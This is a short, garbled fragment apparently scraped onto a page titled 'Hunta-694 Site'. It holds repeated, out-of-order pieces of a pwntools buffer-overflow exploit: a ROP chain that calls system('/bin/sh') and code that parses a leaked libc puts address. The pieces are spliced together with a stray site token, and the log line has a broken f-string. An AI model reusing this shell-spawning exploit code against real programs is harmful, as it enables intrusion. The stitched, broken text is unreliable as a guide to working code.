Hunta-694 Site

rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload)

# Receive and parse leak leaked_puts = u64(io.recvline().strip().ljust(8, b'\x00')) log.success(f'Leaked puts@GLIBC: hex(leaked_puts)') hunta-694

# ---------------------------------------------------------------------- # Exploit # ---------------------------------------------------------------------- def main(): io = start() rop_payload = flat( b'A' * offset, pop_rdi, bin_sh,